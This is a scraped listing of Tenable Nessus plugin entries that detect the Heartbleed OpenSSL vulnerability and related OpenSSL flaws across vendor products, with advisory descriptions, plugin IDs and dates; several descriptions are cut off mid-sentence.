    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73762
    titleBlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed)
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2014-0376.NASL
    descriptionUpdated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id73387
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73387
    titleCentOS 6 : openssl (CESA-2014:0376)
  • NASL familyMisc.
    NASL idKERIO_CONNECT_824.NASL
    descriptionAccording to its banner, the remote host is running a version of Kerio Connect (formerly Kerio MailServer) version 8.2.x prior to 8.2.4. It is, therefore, affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id76402
    published2014-07-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76402
    titleKerio Connect 8.2.x < 8.2.4 Heartbeat Information Disclosure (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4999.NASL
    descriptionFixes CVE-2014-0160 (RHBZ #1085066) Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-04-16
    plugin id73547
    published2014-04-16
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73547
    titleFedora 19 : mingw-openssl-1.0.1e-6.fc19 (2014-4999) (Heartbleed)
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_5631AE98BE9E11E3B5E3C80AA9043978.NASL
    descriptionOpenSSL Reports : A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. The bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users. The code used to handle the Heartbeat Extension does not do sufficient boundary checks on record length, which allows reading beyond the actual payload.
    last seen2020-06-01
    modified2020-06-02
    plugin id73389
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73389
    titleFreeBSD : OpenSSL -- Remote Information Disclosure (5631ae98-be9e-11e3-b5e3-c80aa9043978)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4982.NASL
    descriptionFixes CVE-2014-0160 (RHBZ #1085066) Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-04-15
    plugin id73509
    published2014-04-15
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73509
    titleFedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed)
  • NASL familyWindows
    NASL idHP_VCRM_SSRT101531.NASL
    descriptionThe HP Version Control Repository Manager (VCRM) install on the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77025
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77025
    titleHP Version Control Repository Manager (VCRM) Heartbeat Information Disclosure (Heartbleed)
  • NASL familyCGI abuses
    NASL idWD_ARKEIA_10_1_19_VER_CHECK.NASL
    descriptionThe self-reported version of the remote Western Digital Arkeia device is prior to 10.1.19 / 10.2.9. It is, therefore, potentially affected by the following vulnerabilities : - An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74262
    published2014-06-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74262
    titleWestern Digital Arkeia 10.1.x < 10.1.19 / 10.2.x < 10.2.9 Multiple Vulnerabilities (Heartbleed)
  • NASL familyJunos Local Security Checks
    NASL idJUNIPER_JSA10623.NASL
    descriptionAccording to its self-reported version number, the remote Junos device is affected by an information disclosure vulnerability. An out-of-bounds read error, known as Heartbleed, exists in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. Note that this issue only affects devices with J-Web or the SSL service for JUNOScript enabled.
    last seen2020-03-18
    modified2014-04-18
    plugin id73687
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73687
    titleJuniper Junos OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)
  • NASL familyWindows
    NASL idHP_VCA_SSRT101531.NASL
    descriptionThe installation of HP Version Control Agent (VCA) on the remote Windows host is version 7.2.0, 7.2.1, 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77024
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77024
    titleHP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-2165-1.NASL
    descriptionNeel Mehta discovered that OpenSSL incorrectly handled memory in the TLS heartbeat extension. An attacker could use this issue to obtain up to 64k of memory contents from the client or server, possibly leading to the disclosure of private keys and other sensitive information. (CVE-2014-0160) Yuval Yarom and Naomi Benger discovered that OpenSSL incorrectly handled timing during swap operations in the Montgomery ladder implementation. An attacker could use this issue to perform side-channel attacks and possibly recover ECDSA nonces. (CVE-2014-0076).
    last seen2020-03-18
    modified2014-04-08
    plugin id73402
    published2014-04-08
    reporterUbuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73402
    titleUbuntu 12.04 LTS / 12.10 / 13.10 : openssl vulnerabilities (USN-2165-1)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2014-398.NASL
    description - tor 0.2.4.22 [bnc#878486] Tor was updated to the recommended version of the 0.2.4.x series. - major features in 0.2.4.x : - improved client resilience - support better link encryption with forward secrecy - new NTor circuit handshake - change relay queue for circuit create requests from size-based limit to time-based limit - many bug fixes and minor features - changes contained in 0.2.4.22: Backports numerous high-priority fixes. These include blocking all authority signing keys that may have been affected by the OpenSSL
    last seen2020-06-05
    modified2014-06-13
    plugin id75376
    published2014-06-13
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/75376
    titleopenSUSE Security Update : tor (openSUSE-SU-2014:0719-1) (Heartbleed)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-2896.NASL
    descriptionA vulnerability has been discovered in OpenSSL
    last seen2020-03-17
    modified2014-04-08
    plugin id73388
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73388
    titleDebian DSA-2896-1 : openssl - security update
  • NASL familyCISCO
    NASL idCISCO-VCS-CSCUO16472.NASL
    descriptionAccording to its self-reported version number, the version of Cisco TelePresence Video Communication Server installed on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74010
    published2014-05-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74010
    titleCisco TelePresence Video Communication Server Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idATTACHMATE_REFLECTION_X_HEARTBLEED.NASL
    descriptionThe Attachmate Reflection X install on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74186
    published2014-05-27
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74186
    titleAttachmate Reflection X Heartbeat Information Disclosure (Heartbleed)
  • NASL familyMisc.
    NASL idVMWARE_ESXI_5_5_BUILD_1746974_REMOTE.NASL
    descriptionThe remote VMware ESXi host is 5.5 prior to build 1746974 or 5.5 Update 1 prior to build 1746018. It is, therefore, potentially affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73917
    published2014-05-08
    reporterThis script is (C) 2014-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73917
    titleESXi 5.5 < Build 1746974 / 5.5 Update 1 < Build 1746018 OpenSSL Library Multiple Vulnerabilities (remote check) (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-4879.NASL
    descriptionpull in upstream patch for CVE-2014-0160
    last seen2020-03-17
    modified2014-04-09
    plugin id73429
    published2014-04-09
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73429
    titleFedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-5321.NASL
    descriptionNew upstream release Supports OpenSSL DLLs 1.0.1g. Fixes to take care of OpenSSL,s TLS heartbeat read overrun (CVE-2014-0160). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-17
    modified2014-04-30
    plugin id73775
    published2014-04-30
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73775
    titleFedora 20 : stunnel-5.01-1.fc20 (2014-5321)
  • NASL familyWindows
    NASL idVMWARE_PLAYER_MULTIPLE_VMSA_2014-0004.NASL
    descriptionThe installed version of VMware Player 6.x running on Windows is earlier than 6.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73672
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73672
    titleVMware Player 6.x < 6.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyMandriva Local Security Checks
    NASL idMANDRIVA_MDVSA-2014-123.NASL
    descriptionUpdated tor packages fix multiple vulnerabilities : Tor before 0.2.4.20, when OpenSSL 1.x is used in conjunction with a certain HardwareAccel setting on Intel Sandy Bridge and Ivy Bridge platforms, does not properly generate random numbers for relay identity keys and hidden-service identity keys, which might make it easier for remote attackers to bypass cryptographic protection mechanisms via unspecified vectors (CVE-2013-7295). Update to version 0.2.4.22 solves these major and security problems : - Block authority signing keys that were used on authorities vulnerable to the heartbleed bug in OpenSSL (CVE-2014-0160). - Fix a memory leak that could occur if a microdescriptor parse fails during the tokenizing step. - The relay ciphersuite list is now generated automatically based on uniform criteria, and includes all OpenSSL ciphersuites with acceptable strength and forward secrecy. - Relays now trust themselves to have a better view than clients of which TLS ciphersuites are better than others. - Clients now try to advertise the same list of ciphersuites as Firefox 28. For other changes see the upstream change log
    last seen2020-06-01
    modified2020-06-02
    plugin id74481
    published2014-06-12
    reporterThis script is Copyright (C) 2014-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/74481
    titleMandriva Linux Security Advisory : tor (MDVSA-2014:123)
  • NASL familyMisc.
    NASL idHP_ONBOARD_ADMIN_HEARTBLEED_VERSIONS.NASL
    descriptionThe remote host has version 4.11 or 4.20 of HP BladeSystem c-Class Onboard Administrator. It is, therefore, affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id76509
    published2014-07-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76509
    titleHP BladeSystem c-Class Onboard Administrator 4.11 / 4.20 Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idWEBSENSE_WEB_SECURITY_HEARTBLEED.NASL
    descriptionThe version of Websense Web Security installed on the remote Windows host contains a bundled version of an OpenSSL DLL file. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73759
    published2014-04-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73759
    titleWebsense Web Security Heartbeat Information Disclosure (Heartbleed)
  • NASL familyCGI abuses
    NASL idBLUECOAT_PROXY_AV_3_5_1_9.NASL
    descriptionAccording to its self-reported version number, the firmware installed on the remote host is affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id74037
    published2014-05-16
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74037
    titleBlue Coat ProxyAV 3.5.1.1 - 3.5.1.6 Heartbeat Information Disclosure (Heartbleed)
  • NASL familyFirewalls
    NASL idBLUECOAT_PROXY_SG_6_5_3_6.NASL
    descriptionThe remote Blue Coat ProxySG device
    last seen2020-06-01
    modified2020-06-02
    plugin id73515
    published2014-04-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73515
    titleBlue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0378.NASL
    descriptionAn updated rhev-hypervisor6 package that fixes one security issue is now available. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which corrects this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id79006
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79006
    titleRHEL 6 : rhev-hypervisor6 (RHSA-2014:0378) (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_WEB_GATEWAY_SB10071.NASL
    descriptionThe remote host is running a version of McAfee Web Gateway (MWG) that is affected by an information disclosure vulnerability due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73836
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73836
    titleMcAfee Web Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyWindows
    NASL idIBM_RATIONAL_CLEARQUEST_8_0_1_3_01.NASL
    descriptionThe remote host has a version of IBM Rational ClearQuest 7.1.1.x / 7.1.2.x prior to 7.1.2.13.01 / 8.0.0.x prior to 8.0.0.10.01 / 8.0.1.x prior to 8.0.1.3.01 installed. It is, therefore, potentially affected by multiple vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that allows nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id81782
    published2015-03-12
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/81782
    titleIBM Rational ClearQuest 7.1.1.x / 7.1.2.x < 7.1.2.13.01 / 8.0.0.x < 8.0.0.10.01 / 8.0.1.x < 8.0.1.3.01 OpenSSL Library Multiple Vulnerabilities (credentialed check) (Heartbleed)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2014-5337.NASL
    descriptionNew upstream release with following important changes : Supports OpenSSL DLLs 1.0.1g. Fixes to take care of OpenSSL
    last seen2020-03-17
    modified2014-04-30
    plugin id73776
    published2014-04-30
    reporterThis script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73776
    titleFedora 19 : stunnel-5.01-1.fc19 (2014-5337)
  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2014-0376.NASL
    descriptionFrom Red Hat Security Advisory 2014:0376 : Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id73395
    published2014-04-08
    reporterThis script is Copyright (C) 2014 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73395
    titleOracle Linux 6 : openssl (ELSA-2014-0376)
  • NASL familyMisc.
    NASL idMCAFEE_NGFW_SB10071.NASL
    descriptionThe remote host is running a version of McAfee Next Generation Firewall (NGFW) that is affected by an information disclosure vulnerability due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73835
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73835
    titleMcAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyWeb Servers
    NASL idOPENSSL_1_0_1G.NASL
    descriptionAccording to its banner, the remote web server uses a version of OpenSSL 1.0.1 prior to 1.0.1g. The OpenSSL library is, therefore, reportedly affected by the following vulnerabilities : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73404
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73404
    titleOpenSSL 1.0.1 < 1.0.1g Multiple Vulnerabilities (Heartbleed)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201404-07.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201404-07 (OpenSSL: Information Disclosure) Multiple vulnerabilities have been found in OpenSSL: OpenSSL incorrectly handles memory in the TLS heartbeat extension, leading to information disclosure of 64kb per request, possibly including private keys (&ldquo;Heartbleed bug&rdquo;, OpenSSL 1.0.1 only, CVE-2014-0160). The Montgomery ladder implementation of OpenSSL improperly handles swap operations (CVE-2014-0076). Impact : A remote attacker could exploit these issues to disclose information, including private keys or other sensitive information, or perform side-channel attacks to obtain ECDSA nonces. Workaround : Disabling the tls-heartbeat USE flag (enabled by default) provides a workaround for the CVE-2014-0160 issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id73407
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73407
    titleGLSA-201404-07 : OpenSSL: Information Disclosure
  • NASL familyMisc.
    NASL idJUNOS_PULSE_JSA10623.NASL
    descriptionAccording to its self-reported version, the version of IVE / UAC OS running on the remote host is affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73688
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73688
    titleJunos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)
  • NASL familyNewStart CGSL Local Security Checks
    NASL idNEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL
    descriptionThe remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has openssl packages installed that are affected by multiple vulnerabilities: - OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an error state mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected. (CVE-2017-3737) - There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository. (CVE-2017-3738) - There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen. (CVE-2017-3736) - OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d allows remote attackers to cause a denial of service (infinite loop and memory consumption) via malformed ASN.1 structures that trigger an improperly handled error condition. (CVE-2006-2937) - OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows attackers to cause a denial of service (CPU consumption) via parasitic public keys with large (1) public exponent or (2) public modulus values in X.509 certificates that require extra time to process when using RSA signature verification. (CVE-2006-2940) - Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. (CVE-2006-3738) - OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8 before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1 padding before generating a hash, which allows remote attackers to forge a PKCS #1 v1.5 signature that is signed by that RSA key and prevents OpenSSL from correctly verifying X.509 and other certificates that use PKCS #1. (CVE-2006-4339) - The get_server_hello function in the SSLv2 client code in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions allows remote servers to cause a denial of service (client crash) via unknown vectors that trigger a null pointer dereference. (CVE-2006-4343) - The BN_from_montgomery function in crypto/bn/bn_mont.c in OpenSSL 0.9.8e and earlier does not properly perform Montgomery multiplication, which might allow local users to conduct a side-channel attack and retrieve RSA private keys. (CVE-2007-3108) - Off-by-one error in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8f allows remote attackers to execute arbitrary code via unspecified vectors. (CVE-2007-4995) - Off-by-one error in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 up to 0.9.7l, and 0.9.8 up to 0.9.8f, might allow remote attackers to execute arbitrary code via a crafted packet that triggers a one-byte buffer underflow. NOTE: this issue was introduced as a result of a fix for CVE-2006-3738. As of 20071012, it is unknown whether code execution is possible. (CVE-2007-5135) - Double free vulnerability in OpenSSL 0.9.8f and 0.9.8g, when the TLS server name extensions are enabled, allows remote attackers to cause a denial of service (crash) via a malformed Client Hello packet. NOTE: some of these details are obtained from third party information. (CVE-2008-0891) - OpenSSL 0.9.8f and 0.9.8g allows remote attackers to cause a denial of service (crash) via a TLS handshake that omits the Server Key Exchange message and uses particular cipher suites, which triggers a NULL pointer dereference. (CVE-2008-1672) - The dtls1_buffer_record function in ssl/d1_pkt.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allows remote attackers to cause a denial of service (memory consumption) via a large series of future epoch DTLS records that are buffered in a queue, aka DTLS record buffer limitation bug. (CVE-2009-1377) - Multiple memory leaks in the dtls1_process_out_of_seq_message function in ssl/d1_both.c in OpenSSL 0.9.8k and earlier 0.9.8 versions allow remote attackers to cause a denial of service (memory consumption) via DTLS records that (1) are duplicates or (2) have sequence numbers much greater than current sequence numbers, aka DTLS fragment handling memory leak. (CVE-2009-1378) - Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate. (CVE-2009-1379) - The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post- renegotiation context, related to a plaintext injection attack, aka the Project Mogul issue. (CVE-2009-3555) - Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678. (CVE-2009-4355) - The Cryptographic Message Syntax (CMS) implementation in 